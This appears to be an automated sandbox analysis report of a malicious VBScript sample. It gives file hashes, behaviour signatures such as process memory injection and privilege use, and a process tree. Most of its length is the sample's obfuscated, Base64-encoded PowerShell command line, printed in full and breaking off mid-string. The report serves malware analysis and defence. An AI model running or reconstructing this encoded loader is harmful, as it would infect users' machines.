9629ddea649ce511246c959915ad102d25b3f616e4a4501bab4358895b38a913

General

Target

199436733-161137.vbs
Size

139KB
MD5

95c74f0df0282a10ba41f279741f39b0
SHA1

7dcf489ca3e3ba7325f3aa9f99aac908aa02c6d8
SHA256

9629ddea649ce511246c959915ad102d25b3f616e4a4501bab4358895b38a913
SHA512

c9e743d98767dfc476e56dcd6d0346e4e31c4853fed26670e72498a83eef39cda1c0debc2a50e6c27c9072ae910c0eeffda034c6f4b306537a2859983fc19e10
SSDEEP

3072:05ksEf25PvksR3zlbbjjPrCZYF81apKPya7cZ8ZN:Z2xLVnum81aAyoJ

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
544	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	544	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1380 wrote to memory of 544	1380	WScript.exe	27
PID 1380 wrote to memory of 544	1380	WScript.exe	27
PID 1380 wrote to memory of 544	1380	WScript.exe	27
PID 1380 wrote to memory of 544	1380	WScript.exe	27
PID 544 wrote to memory of 1540	544	powershell.exe	29
PID 544 wrote to memory of 1540	544	powershell.exe	29
PID 544 wrote to memory of 1540	544	powershell.exe	29
PID 544 wrote to memory of 1540	544	powershell.exe	29
PID 1540 wrote to memory of 1556	1540	csc.exe	30
PID 1540 wrote to memory of 1556	1540	csc.exe	30
PID 1540 wrote to memory of 1556	1540	csc.exe	30
PID 1540 wrote to memory of 1556	1540	csc.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\199436733-161137.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1380
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABHAGEAcwBsAGkAZwBoACAAPQAgAEAAJwANAAoARgByAG8AawBvAEEATABzAGsAZQBkAGQAUgBhAGQAaQBvAGQATABhAHoAZwBhAC0AVABhAG4AawBlAFQAVABhAHAAcgBlAHkAUwBjAGgAaQB6AHAASABlAHIAbQBhAGUASQBuAHQAZQBuACAAUgBlAGQAZQBsAC0AUgBlAHYAZQByAFQAQwBhAGIAaQBuAHkAUwBwAHUAbQBvAHAAQQBsAGwAbwByAGUARABkAHMAcwBwAEQAQQBrAHQAaQBlAGUAVQBuAHYAbwBjAGYAYQB1AGQAaQBlAGkATQBhAG4AbwBtAG4ATABlAHAAdABvAGkARgByAGkAdgBvAHQAVABpAGwAbABiAGkATQBvAHQAbwByAG8AUwBhAGQAZQBsAG4ARwB1AGwAcABlACAARABlAHMAZQByAEAAUgBlAGEAZABqACIACgBXAG8AcgBrAGwAdQBpAG4AZABvAGsAcwBNAGIAZQBsAHAAaQBTAHQAaQBsAGsAbgBTAHAAbwByAHQAZwBTAHQAYQByAHQAIABJAG4AbgBvAGMAUwBVAG4AYwB1AG0AeQBMAHkAbQBwAGgAcwBEAHIAaQBuAGsAdABDAGEAbAB5AGMAZQB0AGEAcgBhAHgAbQBzAGgAYQB3AHkAOwAKAEUAbABlAG0AZQB1AEYAaQBkAGUAbABzAEMAaABhAHMAdABpAEEAcgBiAGUAagBuAEgAbwBpAHMAZQBnAFQAeQByAGUAbgAgAE8AcgBpAGUAbgBTAGwAaQBuAGcAYgB5AEMAbwB1AG4AdABzAFMAdABhAGIAaQB0AEIAcgBvAGQAZQBlAE0AbwBkAGUAbABtAHMAcABvAG4AZwAuAFQAcgBpAHAAZQBSAEUAZwBlAG4AcwB1AEgAbwB2AGUAZABuAHMAZQBiAHUAbgB0AEMAYQBsAGwAbwBpAEIAbwB0AGEAbgBtAFQAbwBwAGEAegBlAFAAaQByAGEAdAAuAE8AdgBlAHIAZABJAFQAeQByAGsAZQBuAEMAYQBtAHMAZAB0AFMAdQByAHIAbwBlAFYAYQBsAG0AdQByAFAAbAB1AG0AZQBvAEIAYQByAGQAdQBwAE4AZwBsAGUAbwBTAEsAbwBvAHQAYwBlAHMAYQBsAGEAdAByAEsAbwBnAGUAZwB2AFoAZQBzAHQAZgBpAFYAbwBsAGMAYQBjAEwAYQB0AGkAcwBlAEwAawBrAGUAcgBzAFAAcgBlAGYAZQA7AAoASgBvAGsAZQBsAHAARQBmAHQAZQByAHUARwByAHUAbgBkAGIAVgBhAHIAZQBkAGwAQwBvAG0AbQBlAGkARABlAHIAcwBvAGMARQBzAHQAcgBhACAATQBpAGMAcgBvAHMAVQBkAGsAbwBiAHQAaAB1AG4AYwBoAGEAUwB5AG0AYgBpAHQATgBhAG0AZQB2AGkATQB1AHMAbABpAGMAUwBlAGwAZQBmACAAUgBhAGkAbgBiAGMAQgBvAHIAZABrAGwATQBhAHMAawBpAGEAQwBhAGMAbwB6AHMASgB1AGcAYQB0AHMARwBpAHQAYQBuACAASgByAGcAYQBzAE8ASwBsAGkAZQBuAHYATAB5AGQAcwBrAGUATgBpAHQAdABpAHIATABvAGcAaQBzADEACgBEAHIAaQBrAGYAewBuAGUAdABlAG8AWwBTAGwAdQBtAHMARABHAGUAbgBsAHMAbABFAHAAaQBjAGUAbABNAGkAcwBlAG4ASQBQAHIAYQBlAHMAbQBTAHkAbgBhAG4AcABCAHIAeQBnAGcAbwBLAHIAdQBkAHQAcgBwAHUAawBsAGUAdABEAHUAbwB0AHIAKABQAG4AZQB1AG0AIgBDAG8AcABwAGkAdwBUAGgAeQByAGUAaQBGAGEAcgB2AGYAbgBQAG8AbAB5AG0AcwBUAGEAZwBlAHQAcABGAHkAcgBzAHYAbwBTAHAAbwBpAGwAbwBCAG8AdQBjAGgAbABSAG8AdAB0AGUALgBWAGkAawB0AHUAZABBAGYAZwByAHMAcgBaAG8AbwBzAHAAdgBCAGwAbwBuAGQAIgBBAGsAdABpAGUAKQBQAGUAbgBnAGUAXQBJAG4AdABlAHIAcABLAGwAYQBtAG0AdQBCAGwAbwBvAGQAYgBNAGkAbgBpAHMAbABEAHkAZgBmAGUAaQBVAG4AZABnAGwAYwBBAG4AdABpAHAAIABTAGUAcgB2AGkAcwBXAGUAbABsAHEAdABBAGkAdgBlAHIAYQBUAG8AZQBuAGEAdABTAGgAbwBzAGgAaQBQAGwAYQBuAHQAYwBzAHUAawBrAGUAIABSAGUAZgBpAG4AZQBTAHQAZQB0AGUAeABhAG4AaQBjAHUAdABEAGEAbgBuAGUAZQBCAGkAbABzAGgAcgBRAHUAZQBlAG4AbgBEAHUAbQBtAGUAIABIAHkAcABvAHMAaQBWAG8AbABhAHQAbgBCAGUAZwBlAGoAdABIAHkAZAByAG8AIABTAHAAZQByAG0ARwBTAGkAZwBuAGEAZQBHAG8AZABzAHYAdABUAG8AbAB1AGUARgBKAHUAcwB0AGUAbwBQAHUAbABwAHcAcgBBAHAAcwBpAGQAbQBNAHkAdABoAG8AKABVAG4AZABlAHIAaQBTAG8AbABmAGEAbgBCAHUAcwBlAG4AdABEAGUAbABpAGsAIABhAHgAbwB0AG8AUwBEAGkAYQBrAG8AawBGAHIAZwBlAGgAcgBNAGkAbABpAGUAaQBBAG4AdABpAGoAdgBEAHUAcABsAGkAZQBQAGEAcgBrAGkALABBAHMAdAByAG8AaQBKAGUAbgBzAHkAbgBTAHQAZQBuAGgAdABOAHMAawBlAGQAIABLAHIAYQBrAGUAUwBNAG8AcgBkAHYAawBPAHgAeQBwAHIAbwBzAHUAYwBjAGUAbABLAG8AcgBlAHQAZQBDAG8AeQBzAHQAZABQAGEAcgB2AGUAMQBLAG8AcwBtAGUANwBKAGEAYwBxAHUANwBGAHIAaQBhAGIALABQAGEAaQByAHAAaQBOAHUAbABsAGUAbgBTAHQAcgBhAG4AdABDAG8AbgB0AGEAIABUAGkAbABlAG0ASwBBAGwAdABpAGMAYQBEAHYAcgBnAGsAcgBBAHQAdAByAGEALABSAGUAZgBvAGwAaQBPAHMAdABlAHIAbgBPAG0AZQBuAGkAdABGAG8AcgBzAHkAIABXAGUAcgBlAGMARQB0AHIAbwBkAHMAdABFAHAAbwBzAGUAcgBCAGEAcgBkAGUALABVAG4AZwB1AGkAaQBNAGUAZABpAGMAbgBHAG8AbABkAGYAdABEAGkAcwBjAGkAIABLAG8AbgB0AHIAVgBUAHkAcABvAG4AaQBIAHUAcgB0AGkAdABMAGEAZwBlAHIAYQBWAGQAZABlAGwAbQBVAGIAZQB0AHYALABEAGkAYQBiAGUAaQBKAG8AbABsAGkAbgBEAGkAcwBjAHIAdABNAGkAbABqAGEAIABQAG8AbAB5AGgAQgBSAHUAbgBkAGgAYQBLAGEAbABlAGkAZwBpAG4AdABvAHIAdABNAHUAbAB0AGkAYQBDAG8AbQBtAGUAbABLAHYAbwB0AGUAKQBCAGUAcwBrAHIAOwAKAFMAYwB1AGwAbABbAE4AbwBuAGEAcwBEAE8AcABsAHMAcwBsAEUAbgBjAGgAaQBsAFMAawBvAHYAbABJAEYAbwByAGgAaQBtAFQAcgBpAGsAbwBwAEIAbwByAHQAbwBvAEwAaQBuAGcAdQByAFQAaABhAGwAYQB0AFQAYQBuAGQAZQAoAFcAYQBtAGIAbAAiAEMAaABhAGUAdABzAEQAcgBhAGcAbwBoAEMAbwBtAHMAeQBlAFMAdQB0AHQAZQBsAEUAYQByAHQAaABsAEcAbAB5AGMAbwAzAGQAaQBzAGgAZQAyAFEAdQBhAGQAcgAuAFIAZQBpAGMAaABkAEEAZgB0AGUAbgBsAFUAbQBvAHIAYQBsAE0AYQB0AHIAaQAiAEIAYQBnAGgAYQApAE4AbwBuAGIAbwBdAEQAaQBwAGgAdABwAFIAbwBkAHIAaQB1AFAAaABvAHQAbwBiAFUAbgB0AHIAYQBsAEIAcgBvAG0AaQBpAEIAbwBlAHQAaABjAEIAaQBtAHAAbAAgAGQAbwBtAG8AcgBzAFMAbQBpAGQAZwB0AFIAZQBzAHQAYQBhAHAAYQBkAGwAZQB0AEIAbABlAGcAZgBpAFIAZQB0AHIAaQBjAEEAYwBvAHUAYwAgAEMAaABhAHIAbABlAEwAdQBuAHQAZQB4AEEAbAB1AG0AaQB0AEEAbgBnAGkAbgBlAFAAbABhAGkAYwByAEYAbwByAHQAeQBuAEQAbwBsAGwAYQAgAEYAbABsAGUAcwB2AE0AZQBsAGwAZQBvAFAAaQB0AGgAZQBpAGQAZQBnAGUAbgBkAEsAbgBrAGYAbAAgAEYAbwByAHMAawBTAHQAZQByAHIAbwBIAE0AbwBzAGUAaABGAEYAcgBhAGsAdAByAEYAbwByAHMAawBlAEkAbgB2AG8AbABlAFMAawBkAGUAcwBOAE8AYgBvAGwAdQBhAFMAaQBuAGcAbABtAFUAbgByAGEAbgBlAFUAZAByAGUAZwBNAG8AcABzAHAAYQBhAFQAcgBpAGcAbABwAEQAbwBnAG0AYQBwAEgAbwB2AGUAZABpAFIAYQB1AGsAbABuAEEAYwBoAGwAbwBnAFYAZQByAGQAZQBzAEsAcgBpAG0AbQAoAEEAbAB0AGkAbgBpAGcAYQBiAGYAZQBuAFMAdABpAGsAawB0AEkAbgBjAG8AbQAgAFQAaAB5AHMAYQBTAEQAcgBvAHMAawBvAEYAbABhAGcAZQBsAE8AdgBlAHIAZABpAFQAaQBsAHIAZQBkAFQAbwByAG4AZQBpAEwAYQBrAHIAaQAyAFQAaQBsAGsAbwA5AFMAdABlAG4AYgApAEUAdABoAG8AbAA7AAoAWAB5AGwAbwBmAFsATwB1AHQAcwBpAEQARABvAGsAdQBtAGwAZABhAG0AcABlAGwARQB2AGUAbgBoAEkASQBuAGQAcwBtAG0ARABhAHQAYQBzAHAAQwBvAG4AcwBjAG8AZwBlAG4AYgByAHIAVQBuAGQAZQByAHQAbgBlAHIAZABoACgATgBvAGsAawBlACIATQBvAG8AZABpAHUASQBuAHQAZQByAHMAQgBhAHIAZQByAGUATQBhAG4AZwBvAHIAQQBsAHAAYQBiADMAVABhAHAAcABlADIAUwBrAHIAbwB0ACIATQBhAHIAbQBvACkAQQBtAHQAcwB0AF0ATgBvAG4AYQBwAHAAUgB1AG4AZABzAHUAQQBnAHUAZABpAGIARgByAGEAZwBhAGwAVwBpAHMAaABiAGkARABlAHIAYwBvAGMASABlAGYAdABpACAAVQBzAHkAbgBsAHMAVQBwAHQAaQBlAHQAUwBvAGQAYQB2AGEAVABlAG4AZABvAHQATABpAGcAZQBkAGkARgBvAHIAcwBpAGMATQBpAG4AZABlACAASwBvAG4AdABvAGUAQgBsAG8AdwBmAHgAQQBuAHQAeQBkAHQAUABsAGEAdABvAGUARgBlAHIAbQBlAHIATABlAHcAbgBpAG4AUwBjAG8AbwB0ACAATQBpAHMAcABlAGkAQwByAGkAYgBiAG4AUgBlAGoAcwBlAHQATABhAG4AZwBzACAAQwBhAHIAYQBjAEMAbwBmAGYAZQByAHIAUAByAGUAYgBsAGUAUwBhAGEAcgBlAGEAUwB0AHkAcgB0AHQASAB5AGQAcgBvAGUARgBlAGIAZQByAEQAVABhAG4AZAB0AGkARgBvAHIAbABhAGEAUwBrAHIAdQBkAGwAUgBhAGQAaQBhAG8AQQBmAGYAYQBsAGcAYQBmAHYAaQBrAFAAUABhAHMAdABlAGEAYQBsAGIAdQBxAHIAYgBlAGEAbQBpAGEAVABpAHAAbABvAG0ASQBzAGEAbABsACgASABhAGwAdABlAGkARgBvAHIAdQByAG4AVQBuAHMAbgBhAHQAUABhAHIAdABzACAAYgBpAHIAawBlAEsATgBpAGcAaAB0AGkAUABvAGQAZQB2AGwAQgBhAHIAZABlACwAQwBoAHIAZQBzAGkAQgBvAHIAdABhAG4AcAByAGUAcwBzAHQAVQBuAHMAbABhACAAUwBrAHUAcgBrAEIAVABoAGkAYwBrAGwAQgBpAHMAdABhAGEAYQByAG0AZQBuAGIATgBhAHQAaQBvAGIAUwBrAGEAcgB2AGkAUAByAG8AcABhADEATQB1AHIAbQB1ADcAUgBhAGMAYwBvADUARgByAGUAcgBiACwAQgBvAHIAZwBlAGkASgBvAHMAaABpAG4AUABhAGMAaAB5AHQAUwBlAGwAZQBuACAARgBsAGkAZwBoAFQARAB5AGIAZABlAHYAUwBlAGwAZABvAGEAUgBpAHAAZQBsAG4ARABhAHQAYQBtACwASwBuAGUAYQBkAGkAUABhAHIAYQBwAG4ATQBvAHIAZABlAHQAZwBhAHMAbQBhACAATwBwAGkAbgBpAFYARgBvAHIAZQB2AGkASABvAG0AbwBnAGcASQByAHIAZQBtAGEAUgBlAGoAbwBsACwATQBhAHAAcABlAGkATgBvAG4AcwB1AG4ATQBhAHIAYwBpAHQAagBpAGcAZwBlACAAZQByAGkAbgBkAE0ARQBuAHMAcAByAG8AbQBpAHMAYQBuAG4AUAByAG8AYgBhACkATAB1AHIAaQBrADsACgBBAGMAYQByAGkAWwBFAGMAYgBvAGwARABEAGkAcwBpAG4AbABCAHkAZwBnAGUAbABTAGEAdQB0AGUASQBzAHQAaQBuAGsAbQBTAHQAaQBsAGwAcABCAG8AZwBzAGsAbwBQAGgAcgBhAGcAcgBCAGwAbwBkAHQAdABCAG8AcgBlAHUAKABSAGUAbABhAHgAIgBvAHYAZQByAGwAawBTAGYAbwByAGsAZQBBAGwAbQBzAGcAcgBJAG4AcwB0AHIAbgBIAG8AcgBuAHAAZQBTAGsAeQBkAGUAbABJAG4AaABlAHIAMwBCAHUAZwB0AGgAMgBTAHUAaQBzAHQAIgBBAG4AawBvAG0AKQBTAG8AdQBrAHAAXQBTAGUAcAB0AGUAcABVAHIAbwB2AGEAdQBJAG0AcAByAGEAYgBMAGEAbgBnAHMAbABGAHIAdQBtAHAAaQBSAGUAYgBvAHUAYwBEAGEAdABhAGUAIABUAGUAbwByAGkAcwBBAGwAbABvAHQAdABTAHUAYgBjAHUAYQBPAHYAdQBsAGkAdABPAHIAZABrAGwAaQBzAHAAaQBmAGwAYwBTAGEAbQBsAGUAIABTAGEAbABnAHMAZQBGAGUAbABkAGkAeABCAGEAawBrAGUAdABBAG4AdABpAHEAZQBTAHUAYgBvAGIAcgBMAGUAZwBlAG4AbgBiAHIAbwBkAGUAIABUAGEAbgBpAHMAdgBHAGkAdgBpAG4AbwBDAGkAdgBpAGUAaQBEAGkAbwBsAGUAZABFAGMAaABlAHYAIABTAHAAaQBzAGUARwBUAG8AbAB1AGUAZQBVAG4AcwBsAGUAdAB0AHkAcABlAHMAUwBNAGEAbgBvAG0AdABEAGkAcwByAGUAYQBCAGkAbABsAGkAcgBUAHIAbwBwAG8AdABPAHAAZwBhAG4AdQBIAHUAbgBkAHIAcABCAGUAbgB6AG8ASQBNAGkAZABzAHQAbgBzAGwAaQBiAGIAZgBGAGoAZQByAG4AbwBQAHMAZQB1AGQAKABUAG8AbQBtAGUAaQBBAG4AdABlAG4AbgBUAHMAZQBhAGcAdABVAGQAYgB1AGQAIABzAGUAawB0AGUAVABLAG4AZQBiAGUAYQBCAHUAZABnAGUAcgBtAGkAbgBkAHIAbQBJAGQAbwBsAG8AMQBGAHIAcABlAHIAMQBTAGEAawByAG8ANABBAGQAcgBlAG4AKQBLAG8AZABuAGkAOwAKAEUAcgBvAGIAcgBbAFcAaABlAHIAZQBEAFMAYQBuAGkAdABsAEsAaQBuAGQAbABsAFMAawBhAGsAdABJAG4AZQB3AHMAYQBtAFkAdAB0AHIAaQBwAFYAZQBqAGEAcgBvAEIAZQBmAHIAeQByAFMAdAB5AHAAcwB0AEUAagBsAGUAcgAoAE0AbwBpAHIAZAAiAE4AYQByAGMAbwB1AFMAbAB1AGIAYgBzAGYAbABpAHIAdABlAE0AYQBzAGsAaQByAEIAYQBnAHMAbQAzAFIAYQBhAGQAcwAyAE0AYQBuAGYAdQAiAEcAYQBuAGEAbQApAFYAZQBqAGsAcgBdAE0AZQB0AGUAbgBwAFIAZQBkAGkAZwB1AE0AZQByAHIAZQBiAGYAbwBuAGUAdgBsAEIAbABvAGQAYQBpAEEAbgBtAGUAbABjAFYAaQBsAGoAZQAgAE4AYQB0AHQAZQBzAFIAZQBwAHUAYgB0AE8AdgBlAHIAYgBhAHMAZQBrAHMAdAB0AFUAbgBkAGUAcgBpAEUAZwBhAGQAcwBjAFIAZQBzAHAAaQAgAE0AYQBuAGsAbwBlAFUAbgB3AGkAbgB4AEsAYQBsAGsAawB0AEEAcwBzAGkAbQBlAE8AcgBhAHIAaQByAEIAbwB5AGEAcgBuAHUAbgBhAGcAZwAgAEYAbwBsAGsAZQBpAE0AYQBjAHIAbwBuAEYAbABvAGsAaQB0AFMAbwBsAHMAawAgAEIAaQB6AGEAcgBDAFUAbgBuAGkAdAByAEUAdgBlAGwAeQBlAE8AYgB0AGUAbgBhAEIAbwByAGQAdgB0AGcAYQBzAHIAYQBlAEIAaQBmAGEAbABJAEEAYgBvAG4AbgBjAEQAbwBsAGkAYwBvAEEAbABvAGMAaABuAFMAbgBhAGsAcwBJAFAAcgBhAGsAdABuAEQAaQBzAHQAcgBkAFYAZQBqAHAAbABpAEkAbgBmAHIAYQByAHMAawB1AG4AawBlAE4AaQBoAGkAbABjAEgAeQBwAG8AdAB0AFQAbwBuAG4AaQAoAEQAdQBsAGMAaQBpAEkAcwBzAHUAZQBuAFQAcgBhAGcAZQB0AEEAcgBnAG8AdgAgAFUAbgBpAG4AcwBEAEsAYQBuAHUAdABhAG8AcgBuAGEAbQByAEYAcgBlAGQAbgBrAEcAbwB1AHIAbQAxAFMAbwB1AG4AZAA2AEIAdQB0AGMAaAA3AEUAeAB0AHIAYQApAEwAbwBiAG8AbAA7AAoATgBhAHQAaQBvAFsAVABlAGsAcwB0AEQAUABhAHIAYQBsAGwAUwB0AGkAYwBrAGwAQwBsAHkAcABlAEkAYwBoAGEAZQB0AG0AUgBhAHAAbgBkAHAAVgB1AGcAZwBlAG8ASgB1AHMAdABsAHIARwBvAHUAZAB5AHQARgBlAGQAdABlACgAYgBlAHQAeQBuACIAVAByAGEAYwBoAHUARABlAHQAcgB1AHMAVQBuAGIAcgBlAGUAVQByAGkAbgBvAHIARABqAHYAbABlADMARABpAHMAdABhADIAUwB1AHAAZQByACIASwBvAGwAbABlACkATABlAGQAZQBsAF0ASABlAGwAbABpAHAAUgBvAHQAdABlAHUATQBhAGgAbwBnAGIAUwBrAGEAZQByAGwARABpAHMAZgBhAGkAQgBqAGUAcgBnAGMAVgBlAHIAbQB1ACAAVABoAHUAbgBkAHMAWgB5AGcAbwBtAHQARgBhAGMAcgBkAGEAcABhAHIAbgBhAHQAVQBkAHMAeQByAGkASQBuAHQAcgBlAGMAQgBzAHMAZQBrACAAUwBpAGQAZQByAGUATwB2AGUAcgBlAHgAQgBpAHMAbQBlAHQASwBhAHIAdABlAGUAQQBnAGkAdABlAHIAUwBsAGkAawBwAG4AQQBmAGcAaABhACAAUAByAG0AaQBzAGkATQBlAGQAcABsAG4AUAByAGUAcwBwAHQATQBhAHIAcwBrACAAUABsAGUAbgBzAEcATQBhAHYAZQBkAGUAVgBhAHMAaQBsAHQAVABhAG0AZQByAEQAVQBkAGcAYQB2AGwASgBhAGcAcwBjAGcASABpAGUAbABhAEkAUwBrAGkAYgBzAHQAVABlAG4AZABlAGUAUgBlAHAAZQByAG0ASABhAGEAbgBkAEkAVAByAHkAZwBnAG4ASQBuAGcAYgBlAHQARwByAGEAYQBuACgAQQBmAGwAaQByAGkARwB1AG4AcwBtAG4AQQBuAG4AZQBtAHQATAB1AGYAZgBhACAAUwB5AHYAcwB0AEQARgBvAHIAdQByAGkAUABzAGUAdQBkAG4ARwByAHUAbgB0AG8AbwBtAHYAdQByAHMAcABsAGEAeQBsACwARABlAGMAaQBtAGkAQQBmAHMAZQBuAG4AUwB0AGUAbgB0AHQARQBmAHQAZQByACAATgBlAG0AYQB0AFMAVQBuAHMAaQBtAHYAUwBtAGEAYQBmAGkAUwBpAGwAdgBlAGcATQB5AG8AcwB5AGUAVQBuAHMAbwBwAHIAUwB1AGIAbwByACwATABhAGUAcwBlAGkAVQBkAHAAbgBzAG4AVgBpAHIAYQBzAHQAUwBvAGwAZwB1ACAAcwB0AHYAaAB0AEEARABpAGEAZwByAHQASwBvAGQAZQBzAGgARwBhAHUAZABpAGwAUwB5AG4AbwBuACwAVgBpAGQAdQBuAGkAUwBlAGsAdQBuAG4AQQByAG4AdQBzAHQARABlAG4AcwBpACAASQBuAHQAZQByAFIATABlAHAAaQBkAG8ARAB5AHIAZQB0AGsAVAByAGkAbABsAGsASABpAGQAaAByAGUAWgBvAG8AZgB5AHIARgBvAHUAbABzACkASABqAGUAcgB0ADsACgBCAGkAZgBhAGwAWwBCAGEAbgBnAGsARABBAHMAdwBpAG0AbABJAG4AdABlAHIAbABUAGkAbgBkAGkASQBDAGEAZgBmAGUAbQBiAGEAbAB0AGUAcABMAGUAbgBpAGUAbwBXAG8AbABmAHIAcgBTAHQAbgBrAHMAdABEAGUAYgBvAHIAKABPAHUAdABjAHIAIgBNAGEAdABlAHIAdQBSAGkAZABlAGIAcwBrAGwAaQBzAHQAZQBDAGUAbgB0AGkAcgBWAGEAcgBtAGUAMwBGAGwAbwB0AHMAMgBCAGUAbgBiAHUAIgBLAGEAcwBzAGEAKQBCAGkAdABpAG4AXQBEAG8AawB1AG0AcABCAHIAbwBwAGUAdQBQAHIAZQBiAGUAYgBMAG8AdgBvAHYAbABDAGEAbQBvAHUAaQBSAGUAZwBpAG8AYwBFAG4AagBvAGkAIABTAGkAbQB1AGwAcwBBAGYAbQBpAGwAdABGAGwAdQBvAHIAYQBMAHMAcgBpAHYAdABLAGwAdQBuAHQAaQBWAGkAawB0AHUAYwBTAHQAaQBnAGUAIABVAGQAbABpAHMAZQBIAGUAbQBtAGUAeABUAGUAbABlAHgAdABQAHIAaQBtAHMAZQBJAHMAZABlAHMAcgBJAG0AcABsAGEAbgBCAGEAZwBsAGEAIABWAGEAYQBnAGUAaQBUAGEAcgB0AGUAbgBDAGUAbQBlAG4AdABNAGUAdABhAGcAIABVAGIAZQBzAGsASQBDAGgAcgBvAG0AcwBrAGUAeQBwAHIAWgB0AGkAbgBlAGEAbwBIAGEAYQBuAGQAbwBJAG4AZABsAGcAbQBQAHIAbwBwAG8AZQB0AHIAZQBtAHUAZABOAG8AbgBhAHAAKABGAGkAbAB0AGUAaQBQAG8AYwBrAG0AbgBwAHIAYQBnAHQAdABQAGwAZQBiAGUAIABBAHAAcwBpAHMARABJAG4AdgBlAG4AYQBHAHIAZQBuAGUAZABTAGsAYQBsAGEAKQBMAGkAdgBzAG0AOwAKAFQAbwBtAGgAZQBbAHMAbwBwAGgAaQBEAEEAbgBlAHAAaQBsAEEAYwBhAHIAbwBsAEMAbwBuAHQAYQBJAFAAcgBvAHMAaQBtAEIAZQBmAHIAdQBwAFMAYwBlAG4AZQBvAEEAcgBjAGEAZAByAFAAcgBpAG0AdQB0AFAAaABpAGwAbwAoAE0AYQBsAGUAcwAiAEcAcgB1AHAAcABrAEIAcgBlAHYAcABlAEEAbQBiAGkAdAByAE8AcABmAGEAdABuAFIAZQBkAG4AaQBlAEYAcgBlAGsAdgBsAFMAdABlAGoAbAAzAEgAeQBkAHIAbwAyAEYAbABlAHIAdAAiAHUAbgBlAG0AZQApAEsAbwBuAHQAbwBdAEQAaQBwAGwAbwBwAFIAZQBsAGUAdgB1AEwAbwBiAHMAYwBiAFMAdAB2AGIAbwBsAFQAaQBsAHMAdABpAFMAawB1AG0AcgBjAFUAbgB0AGkAbAAgAFAAbABhAHMAbQBzAFYAYQByAGkAZgB0AEYAcgBhAHMAbwBhAEIAYQBnAGwAbwB0AE0AYQBsAHQAYQBpAFIAbwBxAHUAZQBjAEEAbgBkAGEAbAAgAEwAdQBkAGUAZABlAEsAbABhAHQAdAB4AEwAYQBrAHIAaQB0AFMAdABhAHIAdABlAHUAbgBoAGUAcgByAEQAZQBmAG0AcgBuAEwAYQBuAGQAcwAgAFQAZQBhAHIAYQBpAEQAYQB0AGEAZgBuAE0AYQByAGcAYQB0AEkAbgBkAGUAcgAgAEQAZQBjAGUAbgBWAFMAcABvAG4AcwBpAEYAcgBlAG0AcwByAFMAaQBuAGsAcwB0AEUAawBzAG8AdAB1AEYAbwByAHMAawBhAFMAdQBiAG0AZQBsAEYAcgBhAHQAcgBBAEYAbwBvAGwAaABsAFYAYQBjAGMAaQBsAEMAbwByAGsAcwBvAFQAaABlAG8AbQBjAHMAdgBhAGoAbgAoAFAAZQBwAGUAcgBpAEIAZQBzAHQAaQBuAEIAYQBuAGsAcAB0AFQAcgBvAHMAZgAgAEIAYQBnAGcAcgB2AEkAbgBkAGUAdAAxAFQAagBlAG4AZQAsAFMAaQBnAG4AYQBpAFIAbwBtAGEAbgBuAE0AdQBsAHQAaQB0AFYAYQBlAHIAZQAgAEYAaQBzAHMAZQB2AEEAZwBpAHQAYQAyAEgAYQB1AGwAYQAsAGEAYwByAG8AdABpAE0AaQBzAHIAZwBuAFIAdQBuAG4AaQB0AEwAZQB0AG0AZQAgAEEAZwB0AGUAcgB2AFAAaQBzAHQAYQAzAE0AYQBzAGsAZQAsAEEAYQBsAG4AZABpAFYAbwBsAGQAdABuAE4AbwBuAGQAaQB0AEsAbwBuAGYAZQAgAEsAZABiAGoAZQB2AFIAZQBuAHQAZQA0AEkAbgB0AGUAcgApAE0AYQBuAGgAYQA7AAoATABlAGoAcgBzAFsAUwBlAHAAdABlAEQAVAB1AGYAZgBjAGwAUAB1AG4AYwB0AGwASAB5AGQAcgBhAEkAUAByAGEAeABpAG0ASwBvAHIAdQBuAHAAUAB1AHAAaQBsAG8AWABhAG4AdABoAHIAQQBsAHAAaABlAHQAUwB5AG4AawByACgAQwBvAGQAZgBpACIAUwBtAGEAbABmAGsATwBwAHQAcgB5AGUASgBlAHIAbwBuAHIAVAByAGkAYwByAG4AUwBrAHIAYQBiAGUAUwBjAGEAZwBsAGwATwBtAG0AZQBzADMAQgBhAG4AZABzADIASABlAGwAaQBwACIASAB5AHAAZQByACkAUwB0AGEAbgBsAF0ASQBtAHAAYQBnAHAATABhAG4AYwBlAHUAQQBtAGEAZwBlAGIAdgBlAGQAawBlAGwARgBvAHIAZAByAGkAZQB1AHIAaABvAGMASgB1AHMAdABpACAARgBvAHIAbQBhAHMAUwB1AGIAYwBlAHQATwBrAHQAYQB2AGEAVABpAGQAcwBzAHQAUAByAGUAYQBzAGkAUwBlAG0AaQBkAGMAQgBhAGMAawBjACAAbQBhAHIAbABvAGUAQgBpAGQAcgBhAHgAVQBmAG8AcgBuAHQAQwBhAHAAZQBsAGUASQBuAGoAdQByAHIAUwBrAHUAbABsAG4AUwB1AHAAZQByACAAQQBmAHIAaQBnAEkAVAByAGEAcABlAG4AQQByAG0AYgByAHQATgBzAHQAYgBlAFAARgBvAHIAcwB2AHQAYQBmAGgAcwB0AHIAUwBhAG0AbQBlACAAUAByAG8AbQB1AEUAVABvAGwAcwBlAG4ARwBhAHkAbgBlAHUARgB1AG4AZABoAG0ASgBvAHUAcgBuAFMAQQB0AG8AbQB0AHkAQgBvAHMAZQBsAHMAUwBpAGIAYgBlAHQARgBhAGkAcgBmAGUAUwBuAGEAawBlAG0AVABlAGsAcwB0AEwARgB1AGwAZAB0AG8ARgBvAHIAcwBvAGMARgBvAHIAbgB5AGEARgBvAHIAYgBlAGwAQQBmAGIAcgB5AGUAQgBpAGIAbABpAHMATgBhAGEAZABlAEEAVQBkAHQAcgBhACgATgBvAG4AZgBvAHUAQwBhAHAAaQB0AGkAUwB1AG4AZABoAG4ARwBhAHMAdQBuAHQAUwBwAGUAYwBpACAAQgBsAG8AZAB0AHYAUABoAGEAbABhADEAVABlAHIAcgBhACwARwByAHUAbgBkAGkASw